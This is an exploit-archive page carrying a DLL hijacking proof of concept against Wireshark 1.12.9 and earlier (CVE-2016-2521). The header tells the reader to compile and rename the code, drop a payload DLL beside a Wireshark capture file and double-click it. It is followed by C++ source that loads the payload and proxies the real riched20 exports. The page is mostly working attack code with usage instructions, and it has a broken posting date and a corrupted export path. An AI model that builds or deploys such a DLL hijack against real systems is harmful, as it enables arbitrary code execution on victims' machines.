Home / exploits Wireshark <= 1.12.9 DLL hijacking exploit riched20.dll.dll
Posted on 30 November -0001
<HTML><HEAD><TITLE>Wireshark <= 1.12.9 DLL hijacking exploit (riched20.dll.dll)</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>/* # Exploit Title: Wireshark <= 1.12.9 DLL hijacking exploit (riched20.dll.dll) # Date: 19/04/2016 # Exploit Author: EccE # Vendor Homepage: www.wireshark.org # Software Link: www.wireshark.org/download/win32/all-versions/Wireshark-win32-1.12.5.exe # Version: 1.15.5 & 1.15.1 tested (but should be working on all versions named in the CVE) # Category: local # Tested on: Windows 7 x64 (Service Pack 1, build 7601) # CVE : CVE-2016-2521 Compile and rename this code as "riched20.dll.dll". "poc.dll" file contains your payload. Create a file in the same directory with one of the following extension: Default Wireshark file extension associations: .5vw / .acp / .apc / .atc / .bfr / .cap / .enc / .erf / .fdc / .pcap / .pcapng / .pkt / .rf5 / .snoop / .syc / .tpc / .tr1 / .trace / .trc / .wpc / .wpz Double click & watch a your payload executed =] See this video for a demo: https://www.youtube.com/watch?v=_KX2vMXo3Hc Special thanks @gentilkiwi for pointing me out the obvious ! */ #include "stdafx.h" HINSTANCE hDll = LoadLibraryA("poc.dll"); // Another dll which contains the payload to execute // We link all the exportable functions from Windows riched20.dll to our dll #pragma comment(linker, "/export:CreateTextServices=C:/Windows/System32/riched20.CreateTextServices") #pragma comment(linker, "/export:IID_IRichEditOle=C:/Windows/System32/riched20.IID_IRichEditOle") #pragma comment(linker, "/export:IID_IRichEditOleCallback=C:/Windows/System32/riched20.IID_IRichEditOleCallback") #pragma comment(linker, "/export:IID_ITextHost=C:/Windows/System32/riched20.IID_ITextHost") #pragma comment(linker, "/export:IID_ITextHost2=C:/Windows/System32/riched20.IID_ITextHost2") #pragma comment(linker, "/export:IID_ITextServices=C:/Windows/System32/riched20.IID_ITextServices") #pragma comment(linker, "/export:REExtendedRegisterClass=C:/Windows/System32/riched20.REExtendedRegisterClass") #pragma comment(linker, "/export:RichEdit10ANSIWndProc=C:/Windows/System32/riched20.RichEdit10ANSIWndProc") #pragma comment(linker, "/export:RichEditANSIWndProc=vC:/Windows/System32/riched20.RichEditANSIWndProc") </BODY></HTML>